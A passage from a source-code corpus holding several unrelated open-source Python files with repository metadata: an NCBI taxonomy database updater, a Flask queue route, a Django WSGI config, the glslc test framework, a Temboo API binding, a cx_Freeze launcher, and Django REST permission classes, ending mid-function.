        nodes_file = '%s/nodes.dmp' % ncbi_download
    print('Updating nodes collection in the database...')
    names = ncbi.read_names_dump(names_file)
    nodes = ncbi.read_nodes_dump(nodes_file)
    # Initialize connection with the database.
    database = TaxDb()
    # Bug fix: the original used dict.iteritems(), which exists only in
    # Python 2; .items() works on both Python 2 and 3.
    # NOTE(review): every dump record is added unconditionally here -- the
    # original comment claimed existence was checked first, but no such check
    # is performed (presumably add_record deduplicates; confirm).
    for taxid, parent_taxid in nodes.items():
        new_node = Node(taxid=taxid,
                        scientific_name=names[taxid],
                        upper_hierarchy=parent_taxid)
        database.add_record(node=new_node)
    # Always disconnect the database!
    database.disconnect()
    print('Done!')
def update_links(links_file=None):
    """Stream protein-to-taxid links from an NCBI dump into the local database.

    :param links_file: path to the mapping file; defaults to
        '<ncbi_download>/prot.accession2taxid'.
    """
    print('Reading links and updating local database...')
    # Falsy (None/empty) argument falls back to the standard dump location.
    links_file = links_file or '%s/prot.accession2taxid' % ncbi_download
    database = TaxDb()
    for protein_link in ncbi.protein_taxid_links(file_path=links_file):
        database.add_protein_link(protein_link)
    database.disconnect()
    print('Done!')
if __name__ == "__main__":
    # NOTE(review): sys.argv[1] is documented above as the NCBI *download
    # directory*, but here it is passed as the links *file* path -- this looks
    # inconsistent; confirm which is intended.
    update_links(links_file=sys.argv[1])
    update_nodes()
|
{
"content_hash": "d8a72d7dcdd7887005cea18ca5a2f5b7",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 80,
"avg_line_length": 29.151162790697676,
"alnum_prop": 0.6657359393697646,
"repo_name": "mkorycinski/BioTaxIDMapper",
"id": "82f89235a253e715027ea7dba7692735073ef088",
"size": "2530",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "updatelocaldb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "27012"
}
],
"symlink_target": ""
}
|
'''
Blueprint of the /organizations route.
This route will be registered in `server.py`.
'''
import os
import flask
import app.utilities.load as Load
from rq import Queue
from redis import Redis
from app.classes.ckan import CKAN
from app.functions.manage_queue import getStatus
from app.functions.fetch_store import fetchAndStore
# Shared CKAN API client, initialised once when the blueprint module loads.
ckan = CKAN().init()
# Redis host taken from a Docker-style linked-container environment variable;
# None when the variable is absent -- TODO confirm that is acceptable here.
REDIS_HOST = os.environ.get('REDIS_PORT_6379_TCP_ADDR')
blueprint_organizations = flask.Blueprint('organizations', __name__)
@blueprint_organizations.route('/organizations')
def computeOrganizations():
    '''
    Computes information about all organizations of a CKAN instance.
    When the queue is empty, enqueues one fetch-and-store job per
    organization; either way, returns a JSON progress report.
    '''
    key = 'organizations'
    status = getStatus(key)
    queue = Queue(connection=Redis(host=REDIS_HOST), name=key)
    # Idiom fix: the original loop variable shadowed the builtin ``object``
    # and bound the enqueue result to an unused ``job`` variable.
    org_names = ckan.action.organization_list()
    if status['empty']:
        # Only enqueue when no jobs are pending, to avoid duplicating work.
        for org_name in org_names:
            queue.enqueue(fetchAndStore, key, org_name)
    total = len(org_names)
    completed = total - status['count']
    # Robustness fix: guard the progress ratio against an instance with no
    # organizations (the original raised ZeroDivisionError).
    progress = round((completed / total) * 100, 2) if total else 0
    response = {
        'success': True,
        'message': 'Computing organization information. {n} before finished.'.format(n=status['count']),
        'endpoint': key,
        'time': None,
        'ETA': None,
        'computations': {
            'total': total,
            'completed': completed,
            'queued': status['count'],
            'progress': progress
        }
    }
    return flask.jsonify(**response)
|
{
"content_hash": "80bdcd647fbdf0011b244963b9160a62",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 104,
"avg_line_length": 28.62,
"alnum_prop": 0.6533892382948987,
"repo_name": "luiscape/hdx-monitor-sql-collect",
"id": "1c3ff266537c7e8841b7ba6a4f333c82427eadf9",
"size": "1473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/routes/organizations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "171"
},
{
"name": "Python",
"bytes": "49025"
},
{
"name": "Shell",
"bytes": "1094"
}
],
"symlink_target": ""
}
|
"""
WSGI config for PortFolio project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# Point Django at the project's settings module before the application object
# is created; an already-set DJANGO_SETTINGS_MODULE environment variable wins
# over this default.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PortFolio.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here, e.g.:
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
{
"content_hash": "a8cc7b4d2e3c4e5b522dde7e009f1152",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 79,
"avg_line_length": 40.714285714285715,
"alnum_prop": 0.8008771929824562,
"repo_name": "dubzzz/django-portfolio",
"id": "b985b3d306b0c90751d42f0e97d041c8148f689d",
"size": "1140",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PortFolio/PortFolio/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16609"
},
{
"name": "JavaScript",
"bytes": "5879"
},
{
"name": "Python",
"bytes": "51658"
}
],
"symlink_target": ""
}
|
"""Manages and runs tests from the current working directory.
This will traverse the current working directory and look for python files that
contain subclasses of GlslCTest.
If a class has an @inside_glslc_testsuite decorator, an instance of that
class will be created and serve as a test case in that testsuite. The test
case is then run by the following steps:
1. A temporary directory will be created.
2. The glslc_args member variable will be inspected and all placeholders in it
will be expanded by calling instantiate_for_glslc_args() on placeholders.
The transformed list elements are then supplied as glslc arguments.
3. If the environment member variable exists, its write() method will be
invoked.
4. All expected_* member variables will be inspected and all placeholders in
them will be expanded by calling instantiate_for_expectation() on those
placeholders. After placeholder expansion, if the expected_* variable is
a list, its element will be joined together with '' to form a single
string. These expected_* variables are to be used by the check_*() methods.
5. glslc will be run with the arguments supplied in glslc_args.
6. All check_*() member methods will be called by supplying a TestStatus as
argument. Each check_*() method is expected to return a (Success, Message)
pair where Success is a boolean indicating success and Message is an error
message.
7. If any check_*() method fails, the error message is outputted and the
current test case fails.
If --leave-output was not specified, all temporary files and directories will
be deleted.
"""
import argparse
import fnmatch
import inspect
import os
import shutil
import subprocess
import sys
import tempfile
from collections import defaultdict
from placeholder import PlaceHolder
EXPECTED_BEHAVIOR_PREFIX = 'expected_'
VALIDATE_METHOD_PREFIX = 'check_'
def get_all_variables(instance):
    """Return the names of all non-callable attributes of *instance*."""
    names = []
    for attr in dir(instance):
        if not callable(getattr(instance, attr)):
            names.append(attr)
    return names
def get_all_methods(instance):
    """Return the names of all callable attributes (methods) of *instance*."""
    def _is_method(name):
        return callable(getattr(instance, name))
    return list(filter(_is_method, dir(instance)))
def get_all_superclasses(cls):
"""Returns all superclasses of a given class. Omits root 'object' superclass.
Returns:
A list of superclasses of the given class. The order guarantees that
* A Base class precedes its derived classes, e.g., for "class B(A)", it
will be [..., A, B, ...].
* When there are multiple base classes, base classes declared first
precede those declared later, e.g., for "class C(A, B), it will be
[..., A, B, C, ...]
"""
classes = []
for superclass in cls.__bases__:
for c in get_all_superclasses(superclass):
if c is not object and c not in classes:
classes.append(c)
for superclass in cls.__bases__:
if superclass is not object and superclass not in classes:
classes.append(superclass)
return classes
def get_all_test_methods(test_class):
    """Return all validation (check_*) method names for *test_class*.

    Returns:
      A list of validation method names, ordered so that
      * methods defined in a superclass precede those defined in a
        subclass, e.g., for "class A(B)" the methods of B come first;
      * with multiple superclasses, e.g., "class C(A, B)", methods of A
        precede those of B.
    """
    # Walk the ancestry root-first, then the class itself, collecting
    # check_* names while preserving first-seen order.
    lineage = get_all_superclasses(test_class)
    lineage.append(test_class)
    collected = []
    for klass in lineage:
        for method in get_all_methods(klass):
            if method.startswith(VALIDATE_METHOD_PREFIX) and method not in collected:
                collected.append(method)
    return collected
class GlslCTest:
    """Base class for glslc test cases.

    Subclasses state a test's facts: the shader sources, the glslc command
    arguments (``glslc_args``), and the result checks. A full-fledged test
    case defines ``glslc_args`` plus at least one ``check_*()`` method; each
    check receives a TestStatus and returns a (success, message) pair, where
    success is a boolean and message an error string. The test passes iff
    every check succeeds. Check behaviors are often mixed in by inheriting
    from other classes.
    """

    def name(self):
        """Return this test case's class name, used for progress reporting."""
        return type(self).__name__
class TestStatus:
    """A plain record holding the run status of a single test case."""

    def __init__(self, test_manager, returncode, stdout, stderr, directory, inputs, input_filenames):
        self.test_manager = test_manager
        self.returncode = returncode
        self.stdout = stdout
        self.stderr = stderr
        # Temporary directory in which the test ran.
        self.directory = directory
        # Inputs, as PlaceHolder objects.
        self.inputs = inputs
        # Names of input shader files (potentially including paths).
        self.input_filenames = input_filenames
class GlslCTestException(Exception):
    """Raised for misconfigured test cases in the glslc test framework."""
def inside_glslc_testsuite(testsuite_name):
    """Decorator for subclasses of GlslCTest.

    Checks that a class meets the requirements (see below) for a test case
    class, then places it in the named testsuite.

    * The class needs to be a subclass of GlslCTest.
    * The class needs to have glslc_args defined as a list.
    * The class needs to define at least one check_*() method.
    * All expected_* variables may only be of bool, str, list, or
      PlaceHolder type (TestCase.setUp() expands PlaceHolder expectations).
    * Python runtime will throw an exception if expected_* member attributes
      required by check_*() methods are missing.
    """
    def actual_decorator(cls):
        if not inspect.isclass(cls):
            raise GlslCTestException('Test case should be a class')
        if not issubclass(cls, GlslCTest):
            raise GlslCTestException(
                'All test cases should be subclasses of GlslCTest')
        if 'glslc_args' not in get_all_variables(cls):
            raise GlslCTestException('No glslc_args found in the test case')
        if not isinstance(cls.glslc_args, list):
            raise GlslCTestException('glslc_args needs to be a list')
        if not any(m.startswith(VALIDATE_METHOD_PREFIX)
                   for m in get_all_methods(cls)):
            raise GlslCTestException(
                'No check_*() methods found in the test case')
        # Bug fix: the original iterated get_all_variables(cls), which yields
        # attribute *names* (strings) -- isinstance(v, str) was therefore
        # always True and the type check never fired. Check the attribute
        # *values* instead, restricted to expected_* members as documented;
        # PlaceHolder is allowed because TestCase.setUp() expands bare
        # PlaceHolder expectations explicitly.
        if not all(
                isinstance(getattr(cls, v), (bool, str, list, PlaceHolder))
                for v in get_all_variables(cls)
                if v.startswith(EXPECTED_BEHAVIOR_PREFIX)):
            raise GlslCTestException(
                'expected_* variables are only allowed to be bool, str, or '
                'list type.')
        cls.parent_testsuite = testsuite_name
        return cls
    return actual_decorator
class TestManager:
    """Manages and runs a set of tests, grouped by testsuite name."""

    def __init__(self, executable_path, disassembler_path):
        self.executable_path = executable_path
        self.disassembler_path = disassembler_path
        self.num_successes = 0
        self.num_failures = 0
        self.num_tests = 0
        # When True, temporary test directories are kept after the run.
        self.leave_output = False
        # Maps testsuite name -> list of TestCase instances.
        self.tests = defaultdict(list)

    def notify_result(self, test_case, success, message):
        """Call this to notify the manager of the results of a test run."""
        if success:
            self.num_successes += 1
        else:
            self.num_failures += 1
        progress = '{}/{}'.format(
            self.num_successes + self.num_failures, self.num_tests)
        print('%-10s %-40s ' % (progress, test_case.test.name()) +
              ('Passed' if success else '-Failed-'))
        if not success:
            # Echo the failing command line and the check message.
            print(' '.join(test_case.command))
            print(message)

    def add_test(self, testsuite, test):
        """Register a test case under the given testsuite name."""
        self.tests[testsuite].append(TestCase(test, self))
        self.num_tests += 1

    def run_tests(self):
        """Run every registered test case, suite by suite."""
        for suite in self.tests:
            print('Glslc test suite: "{suite}"'.format(suite=suite))
            for case in self.tests[suite]:
                case.runTest()
class TestCase:
    """A single test case that runs in its own temporary directory."""

    def __init__(self, test, test_manager):
        self.test = test
        self.test_manager = test_manager
        self.inputs = []  # Inputs, as PlaceHolder objects.
        self.file_shaders = []  # Filenames of input shader files.
        self.stdin_shader = None  # Text to be passed to glslc as stdin.

    def setUp(self):
        """Creates environment and instantiates placeholders for the test case."""
        self.directory = tempfile.mkdtemp(dir=os.getcwd())
        # Alias the *original* args list before it is rebound below: after
        # rebinding, self.test.glslc_args no longer contains PlaceHolder
        # objects, but they are still needed to collect inputs/filenames.
        glslc_args = self.test.glslc_args
        # Instantiate placeholders in glslc_args.
        self.test.glslc_args = [
            arg.instantiate_for_glslc_args(self)
            if isinstance(arg, PlaceHolder) else arg
            for arg in self.test.glslc_args]
        # Get all shader files' names from the original (pre-expansion) list.
        self.inputs = [arg for arg in glslc_args if isinstance(arg, PlaceHolder)]
        self.file_shaders = [arg.filename for arg in self.inputs]
        # Optional per-test environment object gets to write files on disk.
        if 'environment' in get_all_variables(self.test):
            self.test.environment.write(self.directory)
        expectations = [v for v in get_all_variables(self.test)
                        if v.startswith(EXPECTED_BEHAVIOR_PREFIX)]
        # Instantiate placeholders in expectations. A list-valued expectation
        # is joined into one string after expansion; a bare PlaceHolder is
        # replaced by its expansion.
        for expectation_name in expectations:
            expectation = getattr(self.test, expectation_name)
            if isinstance(expectation, list):
                expanded_expections = [
                    element.instantiate_for_expectation(self)
                    if isinstance(element, PlaceHolder) else element
                    for element in expectation]
                setattr(
                    self.test, expectation_name,
                    ''.join(expanded_expections))
            elif isinstance(expectation, PlaceHolder):
                setattr(self.test, expectation_name,
                        expectation.instantiate_for_expectation(self))

    def tearDown(self):
        """Removes the directory if we were not instructed to do otherwise."""
        if not self.test_manager.leave_output:
            shutil.rmtree(self.directory)

    def runTest(self):
        """Sets up and runs a test, reports any failures and then cleans up."""
        self.setUp()
        success = False
        message = ''
        try:
            # Full command line: the glslc executable plus expanded args.
            self.command = [self.test_manager.executable_path]
            self.command.extend(self.test.glslc_args)
            process = subprocess.Popen(
                args=self.command, stdin=subprocess.PIPE,
                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                cwd=self.directory)
            # stdin_shader may be None, in which case no stdin is sent.
            output = process.communicate(self.stdin_shader)
            test_status = TestStatus(
                self.test_manager,
                process.returncode, output[0], output[1],
                self.directory, self.inputs, self.file_shaders)
            # Invoke every check_*() method (base-class checks first).
            run_results = [getattr(self.test, test_method)(test_status)
                           for test_method in get_all_test_methods(
                               self.test.__class__)]
            # zip(*pairs) transposes [(ok, msg), ...] into two tuples.
            success, message = list(zip(*run_results))
            success = all(success)
            message = '\n'.join(message)
        except Exception as e:
            # Any unexpected error (bad command, zero checks, ...) fails the
            # test with the exception text as the message.
            success = False
            message = str(e)
        self.test_manager.notify_result(self, success, message)
        self.tearDown()
def main():
    """Parse arguments, discover test files under the test dir, and run them.

    Exits with a non-zero status when any test fails.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('glslc', metavar='path/to/glslc', type=str, nargs=1,
                        help='Path to glslc')
    # Bug fix: the metavar previously read 'path/to/glslc' (copy-paste error).
    parser.add_argument('spirvdis', metavar='path/to/spirv-dis', type=str, nargs=1,
                        help='Path to spirv-dis')
    parser.add_argument('--leave-output', action='store_const', const=1,
                        help='Do not clean up temporary directories')
    parser.add_argument('--test-dir', nargs=1,
                        help='Directory to gather the tests from')
    args = parser.parse_args()
    # Bug fix: take a *copy* of sys.path. The original aliased the live list,
    # so "restoring" it was a no-op and every visited test directory
    # accumulated on sys.path for the rest of the run.
    default_path = list(sys.path)
    root_dir = os.getcwd()
    if args.test_dir:
        root_dir = args.test_dir[0]
    manager = TestManager(args.glslc[0], args.spirvdis[0])
    if args.leave_output:
        manager.leave_output = True
    for root, _, filenames in os.walk(root_dir):
        for filename in fnmatch.filter(filenames, '*.py'):
            if filename.endswith('unittest.py'):
                # Skip unit tests, which are for testing functions of
                # the test framework.
                continue
            # Reset the import path so modules from previously visited test
            # directories cannot shadow modules in this one.
            sys.path = list(default_path)
            sys.path.append(root)
            mod = __import__(os.path.splitext(filename)[0])
            for _, obj, in inspect.getmembers(mod):
                # Only classes decorated with @inside_glslc_testsuite carry
                # the parent_testsuite attribute.
                if inspect.isclass(obj) and hasattr(obj, 'parent_testsuite'):
                    manager.add_test(obj.parent_testsuite, obj())
    manager.run_tests()
    if manager.num_failures > 0:
        sys.exit(-1)


if __name__ == '__main__':
    main()
|
{
"content_hash": "4b9372d7e3b9a501b92aaac087d14069",
"timestamp": "",
"source": "github",
"line_count": 336,
"max_line_length": 101,
"avg_line_length": 40.169642857142854,
"alnum_prop": 0.6327331999703638,
"repo_name": "endlessm/chromium-browser",
"id": "3d4bc173989e9f1c77ebf55bbbe6bc2468fa93a4",
"size": "14125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "third_party/shaderc/src/glslc/test/glslc_test_framework.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FilterPlacesByTopLevelCategory(Choreography):
    # Generated binding for the Temboo Choreo at
    # /Library/Factual/FilterPlacesByTopLevelCategory; all behavior is
    # delegated to the Temboo base classes.
    def __init__(self, temboo_session):
        """
        Create a new instance of the FilterPlacesByTopLevelCategory Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(FilterPlacesByTopLevelCategory, self).__init__(temboo_session, '/Library/Factual/FilterPlacesByTopLevelCategory')

    def new_input_set(self):
        # Factory for the container used to supply this Choreo's inputs.
        return FilterPlacesByTopLevelCategoryInputSet()

    def _make_result_set(self, result, path):
        # Wrap a raw execution result in the Choreo-specific result set.
        return FilterPlacesByTopLevelCategoryResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Handle for an asynchronous execution of this Choreo.
        return FilterPlacesByTopLevelCategoryChoreographyExecution(session, exec_id, path)
class FilterPlacesByTopLevelCategoryInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the FilterPlacesByTopLevelCategory
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """

    # Each setter forwards its value to InputSet._set_input under the Choreo's
    # expected parameter name; no client-side validation is performed.
    def set_APIKey(self, value):
        """
        Set the value of the APIKey input for this Choreo. ((optional, string) The API Key provided by Factual (AKA the OAuth Consumer Key).)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APIKey', value)

    def set_APISecret(self, value):
        """
        Set the value of the APISecret input for this Choreo. ((optional, string) The API Secret provided by Factual (AKA the OAuth Consumer Secret).)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APISecret', value)

    def set_Category(self, value):
        """
        Set the value of the Category input for this Choreo. ((required, string) Enter a Factual top-level category to narrow the search results. See Choreo doc for a list of Factual top-level categories.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Category', value)

    def set_Latitude(self, value):
        """
        Set the value of the Latitude input for this Choreo. ((required, decimal) Enter latitude coordinates of the location defining the center of the search radius.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Latitude', value)

    def set_Longitude(self, value):
        """
        Set the value of the Longitude input for this Choreo. ((required, decimal) Enter longitude coordinates of the location defining the center of the search radius.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Longitude', value)

    def set_Query(self, value):
        """
        Set the value of the Query input for this Choreo. ((optional, string) A search string (i.e. Starbucks))
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Query', value)

    def set_Radius(self, value):
        """
        Set the value of the Radius input for this Choreo. ((required, integer) Provide the radius (in meters, and centered on the latitude-longitude coordinates specified) for which search results will be returned.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Radius', value)
class FilterPlacesByTopLevelCategoryResultSet(ResultSet):
    """Accessor for the values returned by the FilterPlacesByTopLevelCategory Choreo."""

    def getJSONFromString(self, str):
        # The parameter is named `str` (shadowing the builtin) to keep the
        # generated public signature unchanged.
        return json.loads(str)

    def get_Response(self):
        """Return the "Response" output ((json) the response from Factual), or None if absent."""
        return self._output.get('Response', None)
class FilterPlacesByTopLevelCategoryChoreographyExecution(ChoreographyExecution):
    """Tracks an in-flight FilterPlacesByTopLevelCategory run."""

    def _make_result_set(self, response, path):
        # Wrap the raw response exactly as the Choreo class does.
        return FilterPlacesByTopLevelCategoryResultSet(response, path)
|
{
"content_hash": "27ba23445153774466e3a58467ae58ad",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 216,
"avg_line_length": 48.96511627906977,
"alnum_prop": 0.7150320588933745,
"repo_name": "lupyuen/RaspberryPiImage",
"id": "3b4cee2960de02a840b14210d93702d7622db8aa",
"size": "5132",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "home/pi/GrovePi/Software/Python/others/temboo/Library/Factual/FilterPlacesByTopLevelCategory.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "82308"
},
{
"name": "C",
"bytes": "3197439"
},
{
"name": "C#",
"bytes": "33056"
},
{
"name": "C++",
"bytes": "1020255"
},
{
"name": "CSS",
"bytes": "208338"
},
{
"name": "CoffeeScript",
"bytes": "87200"
},
{
"name": "Eagle",
"bytes": "1632170"
},
{
"name": "Go",
"bytes": "3646"
},
{
"name": "Groff",
"bytes": "286691"
},
{
"name": "HTML",
"bytes": "41527"
},
{
"name": "JavaScript",
"bytes": "403603"
},
{
"name": "Makefile",
"bytes": "33808"
},
{
"name": "Objective-C",
"bytes": "69457"
},
{
"name": "Perl",
"bytes": "96047"
},
{
"name": "Processing",
"bytes": "1304"
},
{
"name": "Python",
"bytes": "13358098"
},
{
"name": "Shell",
"bytes": "68795"
},
{
"name": "TeX",
"bytes": "4317"
}
],
"symlink_target": ""
}
|
# Thin launcher: hand control straight to cx_Freeze's command-line driver.
from cx_Freeze import main as _cx_main

_cx_main.main()
|
{
"content_hash": "8fc80849f33d93d1e7748a36aafda8a2",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 26,
"avg_line_length": 13.333333333333334,
"alnum_prop": 0.75,
"repo_name": "Zamiell/RebirthItemTracker",
"id": "e6b94ffdfca56bc8ef4186f8461f0c933b7df04e",
"size": "133",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "src_updater/cxfreeze.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "164142"
}
],
"symlink_target": ""
}
|
import logging
from rest_framework import permissions
from bluebottle.members.models import MemberPlatformSettings
logger = logging.getLogger(__name__)
class PermissionsException(Exception):
    """Raised when a permission class is wired up or implemented incorrectly."""
class IsOwner(permissions.BasePermission):
    """Object-level permission that only grants access to the object's owner."""

    def has_object_permission(self, request, view, obj):
        """Return True when the requesting user owns *obj*."""
        requester = request.user
        return obj.owner == requester
class IsUser(permissions.BasePermission):
    """Object-level permission granting access only to the object's `user`."""

    def has_object_permission(self, request, view, obj):
        """Return True when *obj* belongs to the requesting user."""
        requester = request.user
        return obj.user == requester
class BasePermission(permissions.BasePermission):
    """ BasePermission extends the standard BasePermission from DRF to include
    the ability to get the permissions without the request.

    Currently the `view` is being passed which then gives access to the request.

    TODO: it should be possible to get the permissions based on a `action`, `user`,
    and an optional `obj` which might be a parent type rather than the actual obj
    particularly if the permission being checked is the ability to create an obj
    """

    def get_view_model(self, view):
        """Return the model class declared on *view*.

        Raises:
            PermissionsException: if the view has no `model` attribute, which
                usually means a legacy view is still using ResourcePermissions.
        """
        model_cls = None
        try:
            model_cls = view.model
        except AttributeError:
            message = (
                'The related view `{}` does not have a model property.'.format(view.__class__.__name__),
                'Is this a legacy view using ResourcePermissions?'
            )
            raise PermissionsException(' '.join(message))
        return model_cls

    def has_object_permission(self, request, view, obj):
        """ This action is called from the views which include this permission.
        The call happens after the referenced obj has been fetched and will not be
        called if no object was found.

        Return `True` if permission is granted, `False` otherwise.
        """
        return self.has_object_action_permission(
            request.method, request.user, obj
        )

    def has_permission(self, request, view):
        """ This action is called from the views which include this permission.
        The call happens during view initialisation so it will be called with views returning
        a data set as well as a single object.

        Return `True` if permission is granted, `False` otherwise.
        """
        try:
            model_cls = self.get_view_model(view)
            return self.has_action_permission(
                request.method, request.user, model_cls
            )
        except TypeError as err:
            message = (
                '{} not implemented correctly.'.format(self.__class__.__name__),
                # BUGFIX: format the exception itself rather than `err.message`.
                # Exception.message does not exist on Python 3, so the old code
                # raised AttributeError here and masked the original TypeError.
                'Error: {}'.format(err)
            )
            raise PermissionsException(' '.join(message))
        except PermissionsException:
            # Legacy view without a `model`: fall back to DRF's stock check.
            return super(BasePermission, self).has_permission(request, view)

    def has_parent_permission(self, method, user, parent, model=None):
        """
        Check if user has permission on the parent obj

        Used by RelatedResource permission classes and for return related permissions
        """
        return True

    def has_object_action_permission(self, action, user, obj):
        """ Check if user has permission to access action on obj for the view.

        Used by both the DRF permission system and for returning permissions to the user.
        """
        message = 'has_object_action_permission() must be implemented on {}'.format(self)
        raise NotImplementedError(message)

    def has_action_permission(self, action, user, model_cls):
        """ Check if user has permission to access action for the view.

        Used by both the DRF permission system and for returning permissions to the user.
        """
        message = 'has_action_permission() must be implemented on {}'.format(self)
        raise NotImplementedError(message)
class IsOwnerOrReadOnly(BasePermission):
    """Allow safe (read-only) requests for everyone; writes only for the owner."""

    def has_action_permission(self, action, user, model_cls):
        # Model-level access is never restricted; only object access is.
        return True

    def has_object_permission(self, request, view, obj):
        """Grant read access to anyone and write access to the owner only."""
        if request.method in permissions.SAFE_METHODS:
            return True
        return obj.owner == request.user

    def has_object_action_permission(self, action, user, obj):
        if action in permissions.SAFE_METHODS:
            return True
        return obj.owner == user
class IsAuthenticated(BasePermission):
    """Grant every action, but only to authenticated users."""

    def has_action_permission(self, action, user, obj):
        """Return True when *user* is authenticated; the target is irrelevant."""
        return user.is_authenticated

    def has_object_permission(self, request, view, obj):
        """Return True when the requesting user is authenticated."""
        return request.user.is_authenticated

    def has_object_action_permission(self, action, user, obj):
        return user.is_authenticated
class ResourcePermission(BasePermission, permissions.DjangoModelPermissions):
    """Map HTTP methods onto the project's custom `api_*` model permissions."""

    perms_map = {
        'GET': ['%(app_label)s.api_read_%(model_name)s'],
        'OPTIONS': [],
        'HEAD': ['%(app_label)s.api_read_%(model_name)s'],
        'POST': ['%(app_label)s.api_add_%(model_name)s'],
        'PUT': ['%(app_label)s.api_change_%(model_name)s'],
        'PATCH': ['%(app_label)s.api_change_%(model_name)s'],
        'DELETE': ['%(app_label)s.api_delete_%(model_name)s'],
    }

    def has_object_action_permission(self, action, user, obj):
        # Object-level checks always pass; only model-level perms apply here.
        return True

    def has_action_permission(self, action, user, model_cls):
        """Check the user's mapped model permissions for *action* on *model_cls*."""
        if not model_cls:
            # Nothing to check against without a model class.
            return True
        required = self.get_required_permissions(action, model_cls)
        return user.has_perms(required)

    def __repr__(self):
        return 'ResourcePermission'
class ResourceOwnerPermission(ResourcePermission):
    """Grant access only to the owner of the object."""

    # Same method mapping as ResourcePermission, but checked against the
    # `_own_` permission codenames.
    perms_map = {
        'GET': ['%(app_label)s.api_read_own_%(model_name)s'],
        'OPTIONS': [],
        'HEAD': ['%(app_label)s.api_read_own_%(model_name)s'],
        'POST': ['%(app_label)s.api_add_own_%(model_name)s'],
        'PUT': ['%(app_label)s.api_change_own_%(model_name)s'],
        'PATCH': ['%(app_label)s.api_change_own_%(model_name)s'],
        'DELETE': ['%(app_label)s.api_delete_own_%(model_name)s'],
    }

    def has_object_action_permission(self, action, user, obj):
        """Only the object's owner passes the object-level check."""
        return user == obj.owner
class RelatedResourceOwnerPermission(ResourceOwnerPermission):
    """Grant access based on ownership of the related (parent) resource.

    Child resources are expected to expose a `parent` property returning the
    parent object.
    """

    def has_parent_permission(self, action, user, parent, model=None):
        return user == parent.owner

    def has_object_action_permission(self, action, user, obj):
        # Delegate straight to the parent-ownership check.
        return self.has_parent_permission(action, user, obj.parent)
class TenantConditionalOpenClose(BasePermission):
    """ Allows access only to authenticated users. """

    @staticmethod
    def _allowed(user):
        """Shared open/closed-platform rule for both model and object checks.

        When the platform is configured as "closed", only authenticated users
        may pass; otherwise everyone may.  A missing or partial settings object
        (AttributeError) is treated as an open platform, exactly as before.
        """
        try:
            settings = MemberPlatformSettings.objects.get()
            if settings.closed:
                return user and user.is_authenticated
        except AttributeError:
            pass
        return True

    def has_object_action_permission(self, action, user, obj):
        """Apply the open/closed platform rule at the object level."""
        # CONSISTENCY FIX: the two methods previously duplicated the same
        # try/except block; both now delegate to one helper.
        return self._allowed(user)

    def has_action_permission(self, action, user, model_cls):
        """Apply the open/closed platform rule at the model level."""
        return self._allowed(user)
class AuthenticatedOrReadOnlyPermission(IsAuthenticated):
    """Safe methods are open to all; everything else needs authentication."""

    def has_action_permission(self, action, user, model_cls):
        """Return True for safe actions, or the authentication check otherwise."""
        return action in permissions.SAFE_METHODS or (user and user.is_authenticated)
def OneOf(*permission_classes):
    """Build a composite permission class that grants access when ANY of the
    given permission classes grants it (logical OR)."""
    class OneOf(BasePermission):
        # The classes being OR-ed together; each is instantiated per check.
        permissions = permission_classes

        def has_parent_permission(self, action, user, parent, model):
            # A candidate class only counts if BOTH its parent check and its
            # plain action check succeed.
            return any(
                (
                    perm().has_parent_permission(action, user, parent, model) and
                    perm().has_action_permission(action, user, model)
                ) for perm in self.permissions
            )

        def has_object_action_permission(self, action, user, obj):
            # Likewise, the object check is paired with the action check for
            # the object's model.
            return any(
                (
                    perm().has_object_action_permission(action, user, obj) and
                    perm().has_action_permission(action, user, obj._meta.model)
                ) for perm in self.permissions
            )

        def has_action_permission(self, *args, **kwargs):
            return any(
                perm().has_action_permission(*args, **kwargs) for
